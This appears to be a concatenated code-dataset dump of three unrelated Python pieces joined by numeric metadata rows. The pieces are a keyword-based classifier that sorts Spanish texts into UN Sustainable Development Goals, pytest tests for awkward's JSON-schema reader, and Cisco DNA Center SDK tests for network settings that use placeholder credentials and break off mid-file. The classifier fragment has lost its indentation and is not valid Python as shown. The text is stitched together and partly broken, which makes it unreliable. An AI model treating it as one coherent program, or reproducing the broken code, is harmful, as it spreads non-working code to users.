if 'educación de calidad' in gramas_esp['ODS'][id_token]:
educacion = educacion + txt[t]+ '\n'
educacion_num +=1
if 'fin de la pobreza' in gramas_esp['ODS'][id_token]:
pobreza = pobreza + txt[t]+'\n'
pobreza_num +=1
if 'salud y bienestar' in gramas_esp['ODS'][id_token]:
salud = salud + txt[t]+'\n'
salud_num +=1
if 'igualdad de género' in gramas_esp['ODS'][id_token]:
genero = genero + txt[t]+'\n'
genero_num +=1
if 'agua limpia y saneamiento' in gramas_esp['ODS'][id_token]:
agua = agua + txt[t]+'\n'
agua_num +=1
if 'energía asequible y no contaminante' in gramas_esp['ODS'][id_token]:
energia = energia + txt[t]+'\n'
energia_num +=1
if 'trabajo decente y crecimiento económico' in gramas_esp['ODS'][id_token]:
trabajo = trabajo + txt[t]+'\n'
trabajo_num +=1
if 'industria, innovación e infraestructuras' in gramas_esp['ODS'][id_token]:
industria = industria + txt[t]+'\n'
industria_num+=1
if 'reducción de desigualdades' in gramas_esp['ODS'][id_token]:
desigualdades = desigualdades + txt[t]+'\n'
desigualdades_num +=1
if 'ciudades y comunidades sostenibles' in gramas_esp['ODS'][id_token]:
sostenibles = sostenibles + txt[t]+'\n'
sostenibles_num +=1
if 'producción y consumo responsable' in gramas_esp['ODS'][id_token]:
producción_consumo = producción_consumo + txt[t]+'\n'
producción_consumo_num +=1
if 'acción por el clima' in gramas_esp['ODS'][id_token]:
clima = clima + txt[t]+'\n'
clima_num +=1
if 'vida submarina' in gramas_esp['ODS'][id_token]:
submarina = submarina + txt[t]+'\n'
submarina_num +=1
if 'vida de ecosistemas terrestres' in gramas_esp['ODS'][id_token]:
terrestres = terrestres + txt[t]+'\n'
terrestres_num +=1
if 'paz, justicia e instituciones sólidas' in gramas_esp['ODS'][id_token]:
paz = paz + txt[t]+'\n'
paz_num +=1
if 'alianza para lograr los objetivos' in gramas_esp['ODS'][id_token]:
alianza = alianza + txt[t]+'\n'
alianza_num+=1
if 'hambre cero' in gramas_esp['ODS'][id_token]:
hambre = hambre + txt[t]+'\n'
hambre_num+=1
else:
continue
registro = pd.DataFrame()
registro['ID Documento'] = [i]
registro['Fin de la pobreza'] = [pobreza_num]
registro['TXT Fin de la pobreza'] = [pobreza]
registro['Hambre cero'] = [hambre_num]
registro['TXT Hambre cero'] = [hambre]
registro['Salud y bienestar'] = [salud_num]
registro['TXT Salud y bienestar'] = [salud]
registro['Educación de calidad'] = [educacion_num]
registro['TXT Educación de calidad'] = [educacion]
registro['Igualdad de género'] = [genero_num]
registro['TXT Igualdad de género'] = [genero]
registro['Agua limpia y saneamiento'] = [agua_num]
registro['TXT Agua limpia y saneamiento'] = [agua]
registro['Energía asequible y no contaminante'] = [energia_num]
registro['TXT Energía asequible y no contaminante'] = [energia]
registro['Trabajo decente y crecimiento económico'] = [trabajo_num]
registro['TXT Trabajo decente y crecimiento económico'] = [trabajo]
registro['Industria, innovación e infraestructuras'] = [industria_num]
registro['TXT Industria, innovación e infraestructuras'] = [industria]
registro['Reducción de desigualdades'] = [desigualdades_num]
registro['TXT Reducción de desigualdades'] = [desigualdades]
registro['Ciudades y comunidades sostenibles'] = [sostenibles_num]
registro['TXT Ciudades y comunidades sostenibles'] = [sostenibles]
registro['Producción y consumo responsable'] = [producción_consumo_num]
registro['TXT Producción y consumo responsable'] = [producción_consumo]
registro['Acción por el clima'] = [clima_num]
registro['TXT Acción por el clima'] = [clima]
registro['Vida submarina'] = [submarina_num]
registro['TXT Vida submarina'] = [submarina]
registro['Vida de ecosistemas terrestres'] = [terrestres_num]
registro['TXT Vida de ecosistemas terrestres'] = [terrestres]
registro['Paz, justicia e instituciones sólidas'] = [paz_num]
registro['TXT Paz, justicia e instituciones sólidas'] = [paz]
registro['Alianza para lograr los objetivos'] = [alianza_num]
registro['TXT Alianza para lograr los objetivos'] = [alianza]
matriz = pd.concat([matriz, registro])
matriz = matriz.reset_index(drop=True)
matriz.to_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Matriz_Clasificación_ODS.csv')
else:
for t in range(len(txt)):
i_split = txt[t].split()
for grama in i_split:
grama = str(grama).lower()
if grama.lower() in gramas_por['Gramas'].tolist():
for id_token in range(len(gramas_por)):
if grama.lower() == gramas_por['Gramas'][id_token] and grama.isalpha() and grama.isdigit() == False:
if 'educación de calidad' in gramas_por['ODS'][id_token]:
educacion = educacion + txt[t]+ '\n'
educacion_num +=1
if 'fin de la pobreza' in gramas_por['ODS'][id_token]:
pobreza = pobreza + txt[t]+'\n'
pobreza_num +=1
if 'salud y bienestar' in gramas_por['ODS'][id_token]:
salud = salud + txt[t]+'\n'
salud_num +=1
if 'igualdad de género' in gramas_por['ODS'][id_token]:
genero = genero + txt[t]+'\n'
genero_num +=1
if 'agua limpia y saneamiento' in gramas_por['ODS'][id_token]:
agua = agua + txt[t]+'\n'
agua_num +=1
if 'energía asequible y no contaminante' in gramas_por['ODS'][id_token]:
energia = energia + txt[t]+'\n'
energia_num +=1
if 'trabajo decente y crecimiento económico' in gramas_por['ODS'][id_token]:
trabajo = trabajo + txt[t]+'\n'
trabajo_num +=1
if 'industria, innovación e infraestructuras' in gramas_por['ODS'][id_token]:
industria = industria + txt[t]+'\n'
industria_num+=1
if 'reducción de desigualdades' in gramas_por['ODS'][id_token]:
desigualdades = desigualdades + txt[t]+'\n'
desigualdades_num +=1
if 'ciudades y comunidades sostenibles' in gramas_por['ODS'][id_token]:
sostenibles = sostenibles + txt[t]+'\n'
sostenibles_num +=1
if 'producción y consumo responsable' in gramas_por['ODS'][id_token]:
producción_consumo = producción_consumo + txt[t]+'\n'
producción_consumo_num +=1
if 'acción por el clima' in gramas_por['ODS'][id_token]:
clima = clima + txt[t]+'\n'
clima_num +=1
if 'vida submarina' in gramas_por['ODS'][id_token]:
submarina = submarina + txt[t]+'\n'
submarina_num +=1
if 'vida de ecosistemas terrestres' in gramas_por['ODS'][id_token]:
terrestres = terrestres + txt[t]+'\n'
terrestres_num +=1
if 'paz, justicia e instituciones sólidas' in gramas_por['ODS'][id_token]:
paz = paz + txt[t]+'\n'
paz_num +=1
if 'alianza para lograr los objetivos' in gramas_por['ODS'][id_token]:
alianza = alianza + txt[t]+'\n'
alianza_num+=1
if 'hambre cero' in gramas_por['ODS'][id_token]:
hambre = hambre + txt[t]+'\n'
hambre_num+=1
else:
continue
#elif gramas_esp['ODS'][id_token].lower() == 'hambre cero':
registro = pd.DataFrame()
registro['ID Documento'] = [i]
registro['Fin de la pobreza'] = [pobreza_num]
registro['TXT Fin de la pobreza'] = [pobreza]
registro['Hambre cero'] = [hambre_num]
registro['TXT Hambre cero'] = [hambre]
registro['Salud y bienestar'] = [salud_num]
registro['TXT Salud y bienestar'] = [salud]
registro['Educación de calidad'] = [educacion_num]
registro['TXT Educación de calidad'] = [educacion]
registro['Igualdad de género'] = [genero_num]
registro['TXT Igualdad de género'] = [genero]
registro['Agua limpia y saneamiento'] = [agua_num]
registro['TXT Agua limpia y saneamiento'] = [agua]
registro['Energía asequible y no contaminante'] = [energia_num]
registro['TXT Energía asequible y no contaminante'] = [energia]
registro['Trabajo decente y crecimiento económico'] = [trabajo_num]
registro['TXT Trabajo decente y crecimiento económico'] = [trabajo]
registro['Industria, innovación e infraestructuras'] = [industria_num]
registro['TXT Industria, innovación e infraestructuras'] = [industria]
registro['Reducción de desigualdades'] = [desigualdades_num]
registro['TXT Reducción de desigualdades'] = [desigualdades]
registro['Ciudades y comunidades sostenibles'] = [sostenibles_num]
registro['TXT Ciudades y comunidades sostenibles'] = [sostenibles]
registro['Producción y consumo responsable'] = [producción_consumo_num]
registro['TXT Producción y consumo responsable'] = [producción_consumo]
registro['Acción por el clima'] = [clima_num]
registro['TXT Acción por el clima'] = [clima]
registro['Vida submarina'] = [submarina_num]
registro['TXT Vida submarina'] = [submarina]
registro['Vida de ecosistemas terrestres'] = [terrestres_num]
registro['TXT Vida de ecosistemas terrestres'] = [terrestres]
registro['Paz, justicia e instituciones sólidas'] = [paz_num]
registro['TXT Paz, justicia e instituciones sólidas'] = [paz]
registro['Alianza para lograr los objetivos'] = [alianza_num]
registro['TXT Alianza para lograr los objetivos'] = [alianza]
matriz = pd.concat([matriz, registro])
matriz = matriz.reset_index(drop=True)
matriz.to_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Matriz_Clasificación_ODS.csv')
| 41.936681 | 156 | 0.535482 | 2,040 | 19,207 | 4.925 | 0.089706 | 0.027172 | 0.034836 | 0.025082 | 0.882652 | 0.877177 | 0.857072 | 0.838957 | 0.838957 | 0.838957 | 0 | 0.005258 | 0.35638 | 19,207 | 457 | 157 | 42.028446 | 0.807475 | 0.012808 | 0 | 0.62037 | 0 | 0.006173 | 0.303653 | 0.031899 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003086 | false | 0 | 0.006173 | 0 | 0.012346 | 0.006173 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4d9d058b791729fe54eb8a0937a4891fca972ce5 | 9,460 | py | Python | tests/v2/test_1162-ak-from_json_schema.py | BioGeek/awkward-1.0 | 0cfb4e43c41d5c7d9830cc7b1d750485c0a93eb2 | [
"BSD-3-Clause"
] | null | null | null | tests/v2/test_1162-ak-from_json_schema.py | BioGeek/awkward-1.0 | 0cfb4e43c41d5c7d9830cc7b1d750485c0a93eb2 | [
"BSD-3-Clause"
] | null | null | null | tests/v2/test_1162-ak-from_json_schema.py | BioGeek/awkward-1.0 | 0cfb4e43c41d5c7d9830cc7b1d750485c0a93eb2 | [
"BSD-3-Clause"
] | null | null | null | # BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from __future__ import absolute_import
import pytest # noqa: F401
import numpy as np # noqa: F401
import awkward as ak # noqa: F401
def test_boolean():
result = ak._v2.operations.convert.from_json_schema(
" [ true ,false, true, true, false] ",
{"type": "array", "items": {"type": "boolean"}},
)
assert result.tolist() == [True, False, True, True, False]
result = ak._v2.operations.convert.from_json_schema(
"[]",
{"type": "array", "items": {"type": "boolean"}},
)
assert result.tolist() == []
def test_integer():
result = ak._v2.operations.convert.from_json_schema(
" [ 1 ,2 ,3.0, 4, 5] \n ",
{"type": "array", "items": {"type": "integer"}},
)
assert result.tolist() == [1, 2, 3, 4, 5]
assert str(result.type) == "5 * int64"
result = ak._v2.operations.convert.from_json_schema(
"[ ]",
{"type": "array", "items": {"type": "integer"}},
)
assert result.tolist() == []
assert str(result.type) == "0 * int64"
def test_number():
result = ak._v2.operations.convert.from_json_schema(
" [ 1 ,2,3.14, 4, 5]",
{"type": "array", "items": {"type": "number"}},
)
assert result.tolist() == [1, 2, 3.14, 4, 5]
assert str(result.type) == "5 * float64"
def test_option_boolean():
result = ak._v2.operations.convert.from_json_schema(
" [ true ,false ,null , true, false]",
{"type": "array", "items": {"type": ["boolean", "null"]}},
)
assert result.tolist() == [True, False, None, True, False]
assert str(result.type) == "5 * ?bool"
def test_option_integer():
result = ak._v2.operations.convert.from_json_schema(
" [ 1 ,2,null,4, 5]",
{"type": "array", "items": {"type": ["null", "integer"]}},
)
assert result.tolist() == [1, 2, None, 4, 5]
assert str(result.type) == "5 * ?int64"
result = ak._v2.operations.convert.from_json_schema(
" [ ]",
{"type": "array", "items": {"type": ["null", "integer"]}},
)
assert result.tolist() == []
assert str(result.type) == "0 * ?int64"
def test_string():
result = ak._v2.operations.convert.from_json_schema(
r' [ "" ,"two","three \u2192 3", "\"four\"", "fi\nve"]',
{"type": "array", "items": {"type": "string"}},
)
assert result.tolist() == ["", "two", "three \u2192 3", '"four"', "fi\nve"]
result = ak._v2.operations.convert.from_json_schema(
r"[]",
{"type": "array", "items": {"type": "string"}},
)
assert result.tolist() == []
def test_option_string():
result = ak._v2.operations.convert.from_json_schema(
r' [ "" ,null ,"three \u2192 3", "\"four\"", "fi\nve"]',
{"type": "array", "items": {"type": ["null", "string"]}},
)
assert result.tolist() == ["", None, "three \u2192 3", '"four"', "fi\nve"]
result = ak._v2.operations.convert.from_json_schema(
r"[]",
{"type": "array", "items": {"type": ["null", "string"]}},
)
assert result.tolist() == []
def test_enum_string():
result = ak._v2.operations.convert.from_json_schema(
r'["three", "two", "one", "one", "two", "three"]',
{"type": "array", "items": {"type": "string", "enum": ["one", "two", "three"]}},
)
assert result.tolist() == ["three", "two", "one", "one", "two", "three"]
assert isinstance(result.layout, ak._v2.contents.IndexedArray)
assert result.layout.index.data.tolist() == [2, 1, 0, 0, 1, 2]
def test_option_enum_string():
result = ak._v2.operations.convert.from_json_schema(
r'["three", "two", null, "one", "one", "two", "three"]',
{
"type": "array",
"items": {"type": ["null", "string"], "enum": ["one", "two", "three"]},
},
)
assert result.tolist() == ["three", "two", None, "one", "one", "two", "three"]
assert isinstance(result.layout, ak._v2.contents.IndexedOptionArray)
assert result.layout.index.data.tolist() == [2, 1, -1, 0, 0, 1, 2]
def test_array_integer():
result = ak._v2.operations.convert.from_json_schema(
" [ [ 1 ,2, 3], [], [4, 5]]",
{"type": "array", "items": {"type": "array", "items": {"type": "integer"}}},
)
assert result.tolist() == [[1, 2, 3], [], [4, 5]]
assert str(result.type) == "3 * var * int64"
result = ak._v2.operations.convert.from_json_schema(
"[]",
{"type": "array", "items": {"type": "array", "items": {"type": "integer"}}},
)
assert result.tolist() == []
def test_regulararray_integer():
result = ak._v2.operations.convert.from_json_schema(
"[[1, 2, 3], [4, 5, 6]]",
{
"type": "array",
"items": {
"type": "array",
"items": {"type": "integer"},
"minItems": 3,
"maxItems": 3,
},
},
)
assert result.tolist() == [[1, 2, 3], [4, 5, 6]]
assert str(result.type) == "2 * 3 * int64"
def test_option_regulararray_integer():
result = ak._v2.operations.convert.from_json_schema(
"[[1, 2, 3], null, [4, 5, 6]]",
{
"type": "array",
"items": {
"type": ["array", "null"],
"items": {"type": "integer"},
"minItems": 3,
"maxItems": 3,
},
},
)
assert result.tolist() == [[1, 2, 3], None, [4, 5, 6]]
assert str(result.type) == "3 * option[3 * int64]"
def test_option_array_integer():
result = ak._v2.operations.convert.from_json_schema(
" [ [ 1 ,2,3 ],null,[ ], [4, 5]]",
{
"type": "array",
"items": {"type": ["null", "array"], "items": {"type": "integer"}},
},
)
assert result.tolist() == [[1, 2, 3], None, [], [4, 5]]
assert str(result.type) == "4 * option[var * int64]"
result = ak._v2.operations.convert.from_json_schema(
"[]",
{
"type": "array",
"items": {"type": ["null", "array"], "items": {"type": "integer"}},
},
)
assert result.tolist() == []
def test_option_array_option_integer():
result = ak._v2.operations.convert.from_json_schema(
" [ [ 1 ,2,3 ],null,[ ] ,[null, 5]]",
{
"type": "array",
"items": {
"type": ["null", "array"],
"items": {"type": ["integer", "null"]},
},
},
)
assert result.tolist() == [[1, 2, 3], None, [], [None, 5]]
result = ak._v2.operations.convert.from_json_schema(
"[]",
{
"type": "array",
"items": {
"type": ["null", "array"],
"items": {"type": ["integer", "null"]},
},
},
)
assert result.tolist() == []
def test_array_array_integer():
result = ak._v2.operations.convert.from_json_schema(
" [ [ [ 1 ,2,3 ] ] ,[ [], [4, 5]], []]",
{
"type": "array",
"items": {
"type": "array",
"items": {"type": "array", "items": {"type": "integer"}},
},
},
)
assert result.tolist() == [[[1, 2, 3]], [[], [4, 5]], []]
def test_record():
result = ak._v2.operations.convert.from_json_schema(
' [ { "x" :1 ,"y":1.1},{"x": 2, "y": 2.2}, {"x": 3, "y": 3.3}]',
{
"type": "array",
"items": {
"type": "object",
"properties": {"x": {"type": "integer"}, "y": {"type": "number"}},
"required": ["x", "y"],
},
},
)
assert result.tolist() == [
{"x": 1, "y": 1.1},
{"x": 2, "y": 2.2},
{"x": 3, "y": 3.3},
]
result = ak._v2.operations.convert.from_json_schema(
"[]",
{
"type": "array",
"items": {
"type": "object",
"properties": {"x": {"type": "integer"}, "y": {"type": "number"}},
"required": ["x", "y"],
},
},
)
assert result.tolist() == []
def test_option_record():
result = ak._v2.operations.convert.from_json_schema(
' [ { "x" : 1 ,"y":1.1},null ,{"x": 2, "y": 2.2}, {"x": 3, "y": 3.3}]',
{
"type": "array",
"items": {
"type": ["object", "null"],
"properties": {"x": {"type": "integer"}, "y": {"type": "number"}},
"required": ["x", "y"],
},
},
)
assert result.tolist() == [
{"x": 1, "y": 1.1},
None,
{"x": 2, "y": 2.2},
{"x": 3, "y": 3.3},
]
result = ak._v2.operations.convert.from_json_schema(
"[]",
{
"type": "array",
"items": {
"type": ["object", "null"],
"properties": {"x": {"type": "integer"}, "y": {"type": "number"}},
"required": ["x", "y"],
},
},
)
assert result.tolist() == []
def test_top_record():
result = ak._v2.operations.convert.from_json_schema(
' { "x" :1 ,"y":1.1} ',
{
"type": "object",
"properties": {"y": {"type": "number"}, "x": {"type": "integer"}},
"required": ["x", "y"],
},
)
assert result.tolist() == {"x": 1, "y": 1.1}
| 30.516129 | 88 | 0.466808 | 1,029 | 9,460 | 4.167153 | 0.082604 | 0.077659 | 0.117537 | 0.134328 | 0.909049 | 0.879431 | 0.860075 | 0.821828 | 0.750466 | 0.720382 | 0 | 0.037273 | 0.302326 | 9,460 | 309 | 89 | 30.614887 | 0.612424 | 0.012474 | 0 | 0.45 | 0 | 0.007692 | 0.222984 | 0 | 0 | 0 | 0 | 0 | 0.161538 | 1 | 0.069231 | false | 0 | 0.015385 | 0 | 0.084615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4db6f19db9e6d27b08fb344ef1087fac2a2020b8 | 32,883 | py | Python | tests/api/v2_2_2_3/test_network_settings.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 32 | 2019-09-05T05:16:56.000Z | 2022-03-22T09:50:38.000Z | tests/api/v2_2_2_3/test_network_settings.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 35 | 2019-09-07T18:58:54.000Z | 2022-03-24T19:29:36.000Z | tests/api/v2_2_2_3/test_network_settings.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 18 | 2019-09-09T11:07:21.000Z | 2022-03-25T08:49:59.000Z | # -*- coding: utf-8 -*-
"""DNACenterAPI network_settings API fixtures and tests.
Copyright (c) 2019-2021 Cisco Systems.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import pytest
from fastjsonschema.exceptions import JsonSchemaException
from dnacentersdk.exceptions import MalformedRequest
from tests.environment import DNA_CENTER_VERSION
pytestmark = pytest.mark.skipif(DNA_CENTER_VERSION != '2.2.2.3', reason='version does not match')
def is_valid_assign_credential_to_site(json_schema_validate, obj):
json_schema_validate('jsd_4e4f91ea42515ccdbc24549b84ca1e90_v2_2_2_3').validate(obj)
return True
def assign_credential_to_site(api):
endpoint_result = api.network_settings.assign_credential_to_site(
active_validation=True,
cliId='string',
httpRead='string',
httpWrite='string',
payload=None,
site_id='string',
snmpV2ReadId='string',
snmpV2WriteId='string',
snmpV3Id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_assign_credential_to_site(api, validator):
try:
assert is_valid_assign_credential_to_site(
validator,
assign_credential_to_site(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def assign_credential_to_site_default(api):
endpoint_result = api.network_settings.assign_credential_to_site(
active_validation=True,
cliId=None,
httpRead=None,
httpWrite=None,
payload=None,
site_id='string',
snmpV2ReadId=None,
snmpV2WriteId=None,
snmpV3Id=None
)
return endpoint_result
@pytest.mark.network_settings
def test_assign_credential_to_site_default(api, validator):
try:
assert is_valid_assign_credential_to_site(
validator,
assign_credential_to_site_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_create_device_credentials(json_schema_validate, obj):
json_schema_validate('jsd_903cf2cac6f150c9bee9ade37921b162_v2_2_2_3').validate(obj)
return True
def create_device_credentials(api):
endpoint_result = api.network_settings.create_device_credentials(
active_validation=True,
payload=None,
settings={'cliCredential': [{'description': 'string', 'username': 'string', 'password': 'string', 'enablePassword': 'string'}], 'snmpV2cRead': [{'description': 'string', 'readCommunity': 'string'}], 'snmpV2cWrite': [{'description': 'string', 'writeCommunity': 'string'}], 'snmpV3': [{'description': 'string', 'username': 'string', 'privacyType': 'string', 'privacyPassword': 'string', 'authType': 'string', 'authPassword': 'string', 'snmpMode': 'string'}], 'httpsRead': [{'name': 'string', 'username': 'string', 'password': 'string', 'port': 0}], 'httpsWrite': [{'name': 'string', 'username': 'string', 'password': 'string', 'port': 0}]}
)
return endpoint_result
@pytest.mark.network_settings
def test_create_device_credentials(api, validator):
try:
assert is_valid_create_device_credentials(
validator,
create_device_credentials(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def create_device_credentials_default(api):
endpoint_result = api.network_settings.create_device_credentials(
active_validation=True,
payload=None,
settings=None
)
return endpoint_result
@pytest.mark.network_settings
def test_create_device_credentials_default(api, validator):
try:
assert is_valid_create_device_credentials(
validator,
create_device_credentials_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_update_device_credentials(json_schema_validate, obj):
json_schema_validate('jsd_722d7161b33157dba957ba18eda440c2_v2_2_2_3').validate(obj)
return True
def update_device_credentials(api):
endpoint_result = api.network_settings.update_device_credentials(
active_validation=True,
payload=None,
settings={'cliCredential': {'description': 'string', 'username': 'string', 'password': 'string', 'enablePassword': 'string', 'id': 'string'}, 'snmpV2cRead': {'description': 'string', 'readCommunity': 'string', 'id': 'string'}, 'snmpV2cWrite': {'description': 'string', 'writeCommunity': 'string', 'id': 'string'}, 'snmpV3': {'authPassword': 'string', 'authType': 'string', 'snmpMode': 'string', 'privacyPassword': 'string', 'privacyType': 'string', 'username': 'string', 'description': 'string', 'id': 'string'}, 'httpsRead': {'name': 'string', 'username': 'string', 'password': 'string', 'port': 'string', 'id': 'string'}, 'httpsWrite': {'name': 'string', 'username': 'string', 'password': 'string', 'port': 'string', 'id': 'string'}}
)
return endpoint_result
@pytest.mark.network_settings
def test_update_device_credentials(api, validator):
try:
assert is_valid_update_device_credentials(
validator,
update_device_credentials(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def update_device_credentials_default(api):
endpoint_result = api.network_settings.update_device_credentials(
active_validation=True,
payload=None,
settings=None
)
return endpoint_result
@pytest.mark.network_settings
def test_update_device_credentials_default(api, validator):
try:
assert is_valid_update_device_credentials(
validator,
update_device_credentials_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_device_credential_details(json_schema_validate, obj):
json_schema_validate('jsd_403067d8cf995d9d99bdc31707817456_v2_2_2_3').validate(obj)
return True
def get_device_credential_details(api):
endpoint_result = api.network_settings.get_device_credential_details(
site_id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_get_device_credential_details(api, validator):
try:
assert is_valid_get_device_credential_details(
validator,
get_device_credential_details(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def get_device_credential_details_default(api):
endpoint_result = api.network_settings.get_device_credential_details(
site_id=None
)
return endpoint_result
@pytest.mark.network_settings
def test_get_device_credential_details_default(api, validator):
try:
assert is_valid_get_device_credential_details(
validator,
get_device_credential_details_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_delete_device_credential(json_schema_validate, obj):
json_schema_validate('jsd_598e8e021f1c51eeaf0d102084481486_v2_2_2_3').validate(obj)
return True
def delete_device_credential(api):
endpoint_result = api.network_settings.delete_device_credential(
id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_delete_device_credential(api, validator):
try:
assert is_valid_delete_device_credential(
validator,
delete_device_credential(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def delete_device_credential_default(api):
endpoint_result = api.network_settings.delete_device_credential(
id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_delete_device_credential_default(api, validator):
try:
assert is_valid_delete_device_credential(
validator,
delete_device_credential_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_global_pool(json_schema_validate, obj):
json_schema_validate('jsd_ebdcd84fc41754a69eaeacf7c0b0731c_v2_2_2_3').validate(obj)
return True
def get_global_pool(api):
endpoint_result = api.network_settings.get_global_pool(
limit='string',
offset='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_get_global_pool(api, validator):
try:
assert is_valid_get_global_pool(
validator,
get_global_pool(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def get_global_pool_default(api):
endpoint_result = api.network_settings.get_global_pool(
limit=None,
offset=None
)
return endpoint_result
@pytest.mark.network_settings
def test_get_global_pool_default(api, validator):
try:
assert is_valid_get_global_pool(
validator,
get_global_pool_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_update_global_pool(json_schema_validate, obj):
json_schema_validate('jsd_5c380301e3e05423bdc1857ff00ae77a_v2_2_2_3').validate(obj)
return True
def update_global_pool(api):
endpoint_result = api.network_settings.update_global_pool(
active_validation=True,
payload=None,
settings={'ippool': [{'ipPoolName': 'string', 'gateway': 'string', 'dhcpServerIps': ['string'], 'dnsServerIps': ['string'], 'id': 'string'}]}
)
return endpoint_result
@pytest.mark.network_settings
def test_update_global_pool(api, validator):
try:
assert is_valid_update_global_pool(
validator,
update_global_pool(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def update_global_pool_default(api):
endpoint_result = api.network_settings.update_global_pool(
active_validation=True,
payload=None,
settings=None
)
return endpoint_result
@pytest.mark.network_settings
def test_update_global_pool_default(api, validator):
try:
assert is_valid_update_global_pool(
validator,
update_global_pool_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_create_global_pool(json_schema_validate, obj):
json_schema_validate('jsd_eecf4323cb285985be72a7e061891059_v2_2_2_3').validate(obj)
return True
def create_global_pool(api):
endpoint_result = api.network_settings.create_global_pool(
active_validation=True,
payload=None,
settings={'ippool': [{'ipPoolName': 'string', 'type': 'string', 'ipPoolCidr': 'string', 'gateway': 'string', 'dhcpServerIps': ['string'], 'dnsServerIps': ['string'], 'IpAddressSpace': 'string'}]}
)
return endpoint_result
@pytest.mark.network_settings
def test_create_global_pool(api, validator):
try:
assert is_valid_create_global_pool(
validator,
create_global_pool(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def create_global_pool_default(api):
endpoint_result = api.network_settings.create_global_pool(
active_validation=True,
payload=None,
settings=None
)
return endpoint_result
@pytest.mark.network_settings
def test_create_global_pool_default(api, validator):
try:
assert is_valid_create_global_pool(
validator,
create_global_pool_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_delete_global_ip_pool(json_schema_validate, obj):
json_schema_validate('jsd_61f9079863c95acd945c51f728cbf81f_v2_2_2_3').validate(obj)
return True
def delete_global_ip_pool(api):
endpoint_result = api.network_settings.delete_global_ip_pool(
id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_delete_global_ip_pool(api, validator):
try:
assert is_valid_delete_global_ip_pool(
validator,
delete_global_ip_pool(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def delete_global_ip_pool_default(api):
endpoint_result = api.network_settings.delete_global_ip_pool(
id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_delete_global_ip_pool_default(api, validator):
try:
assert is_valid_delete_global_ip_pool(
validator,
delete_global_ip_pool_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_network(json_schema_validate, obj):
json_schema_validate('jsd_40397b199c175281977a7e9e6bd9255b_v2_2_2_3').validate(obj)
return True
def get_network(api):
